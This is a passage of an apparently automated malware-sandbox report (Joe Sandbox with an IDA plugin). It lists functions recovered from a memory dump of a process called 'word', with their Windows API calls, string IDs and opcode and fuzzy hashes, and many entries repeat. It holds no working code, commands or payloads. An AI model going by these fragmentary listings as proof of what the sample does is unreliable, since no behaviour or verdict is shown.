                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                    • String ID:
                                                                    • API String ID: 132634196-0
                                                                    • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                    • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                    • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                    • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                    APIs
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                      • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                    • __getptd_noexit.LIBCMT ref: 00415620
                                                                    • CloseHandle.KERNEL32(?), ref: 00415634
                                                                    • __freeptd.LIBCMT ref: 0041563B
                                                                    • ExitThread.KERNEL32 ref: 00415643
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 3798957060-0
                                                                    • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                    • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                    • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                    • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                    APIs
                                                                      • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                    • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                      • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                      • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                      • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                    • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                      • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                    • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                      • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                    • ExitThread.KERNEL32 ref: 004156BD
                                                                    • __freefls@4.LIBCMT ref: 004156D9
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                    • String ID:
                                                                    • API String ID: 1537469427-0
                                                                    • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                    • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                    • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                    • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _malloc
                                                                    • String ID: Default$|k
                                                                    • API String ID: 1579825452-2254895183
                                                                    • Opcode ID: 60b8d1c7ac694ac0d0ac1252567bc46d98293f553fd654084b7e19b8298e0069
                                                                    • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                                    • Opcode Fuzzy Hash: 60b8d1c7ac694ac0d0ac1252567bc46d98293f553fd654084b7e19b8298e0069
                                                                    • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                                    APIs
                                                                      • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                    • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                    • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                    • CoUninitialize.OLE32 ref: 0046CE50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                    • String ID: .lnk
                                                                    • API String ID: 886957087-24824748
                                                                    • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                    • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                    • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                    • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                    Strings
                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                    • API String ID: 176396367-557222456
                                                                    • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                    • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                    • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                    • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                    APIs
                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                    • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                    • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCopyInit_malloc
                                                                    • String ID: 4RH
                                                                    • API String ID: 2981388473-749298218
                                                                    • Opcode ID: 72cfea4116471a6edb45d35d5b23ec76043eafe67c865d1f0ebc239afbd79b93
                                                                    • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                    • Opcode Fuzzy Hash: 72cfea4116471a6edb45d35d5b23ec76043eafe67c865d1f0ebc239afbd79b93
                                                                    • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                    APIs
                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                    • __wcsnicmp.LIBCMT ref: 0046681A
                                                                    • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                    • String ID: LPT$HH
                                                                    • API String ID: 3035604524-2728063697
                                                                    • Opcode ID: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
                                                                    • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                    • Opcode Fuzzy Hash: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
                                                                    • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                    APIs
                                                                      • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32 ref: 004374E2
                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                      • Part of subcall function 00437472: ReadProcessMemory.KERNEL32 ref: 004374A5
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                    • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                    • String ID: @
                                                                    • API String ID: 4055202900-2766056989
                                                                    • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                    • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                    • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                    • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00449B2E
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449B9C
                                                                    • SendMessageW.USER32(0031E158,00000469,?,00000000), ref: 00449BF7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageMoveRectSend
                                                                    • String ID: X1
                                                                    • API String ID: 4269771112-2397719451
                                                                    • Opcode ID: 4d19423c0bfc3f881ab8ca646a671160d9b3563d522f9926aab549df03f0587c
                                                                    • Instruction ID: e508488f702fbc50c1559f6c7ec12802fe4172382056b8995399bf84c1675f17
                                                                    • Opcode Fuzzy Hash: 4d19423c0bfc3f881ab8ca646a671160d9b3563d522f9926aab549df03f0587c
                                                                    • Instruction Fuzzy Hash: 89419A70204641AFE724CF24D881E7BB7A9FB89714F008A1EF19197351E774BD80DBA9
                                                                    APIs
                                                                    • MoveWindow.USER32(?,004A83D8,00000000,?,?,00000000), ref: 00440DC7
                                                                    • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440DE6
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00440E0C
                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 00440E3E
                                                                    • ShowWindow.USER32(?,00000000), ref: 00440E62
                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440E7E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$InvalidateMoveProcRectShow
                                                                    • String ID: X1
                                                                    • API String ID: 4037296999-2397719451
                                                                    • Opcode ID: d1c57b00791a8315eaa483b8e66cc43cf618c503a38761f2299fd22608959c2a
                                                                    • Instruction ID: bcda879dc66b10d245a90a7ed40df89d10d9938a03d93e03f7abdd0b7ff48564
                                                                    • Opcode Fuzzy Hash: d1c57b00791a8315eaa483b8e66cc43cf618c503a38761f2299fd22608959c2a
                                                                    • Instruction Fuzzy Hash: D45178B06087028BE324CF68C98076BB7E1FF88B44F14491EFAD597250E738B95ACB55
                                                                    APIs
                                                                    • MoveWindow.USER32(?,004A83D8,00000000,?,?,00000000), ref: 00440DC7
                                                                    • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440DE6
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00440E0C
                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 00440E3E
                                                                    • ShowWindow.USER32(?,00000000), ref: 00440E62
                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440E7E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$InvalidateMoveProcRectShow
                                                                    • String ID: X1
                                                                    • API String ID: 4037296999-2397719451
                                                                    • Opcode ID: fc410d95a4fe0568344445656b193ee776445bfad3aebd2bbff95d421bbcaa9c
                                                                    • Instruction ID: 2b46c7824bf4544c0e391e94ea7ff91743a1a3c2accfc933bdfb9e377f3e5a16
                                                                    • Opcode Fuzzy Hash: fc410d95a4fe0568344445656b193ee776445bfad3aebd2bbff95d421bbcaa9c
                                                                    • Instruction Fuzzy Hash: 6F5178B06087028BE324CF68C98176BB7E1BF88B44F14491EFAD597250E738B959CB56
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CrackInternet_memset_wcslen
                                                                    • String ID: |
                                                                    • API String ID: 915713708-2343686810
                                                                    • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                    • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                                    • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                    • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                    APIs
                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                    • HttpQueryInfoW.WININET ref: 0044A892
                                                                      • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                    • String ID:
                                                                    • API String ID: 3705125965-3916222277
                                                                    • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                    • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                    • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                    • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                    APIs
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000,?,000000F0), ref: 00450AB3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long
                                                                    • String ID: SysTreeView32
                                                                    • API String ID: 847901565-1698111956
                                                                    • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                    • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                    • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                    • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                    • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                    • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: AU3_GetPluginDetails
                                                                    • API String ID: 145871493-4132174516
                                                                    • Opcode ID: b8bcd1e98732d99e0d2667cb92019d9a302b3b69227083a3aefc65a6e97514e3
                                                                    • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                    • Opcode Fuzzy Hash: b8bcd1e98732d99e0d2667cb92019d9a302b3b69227083a3aefc65a6e97514e3
                                                                    • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
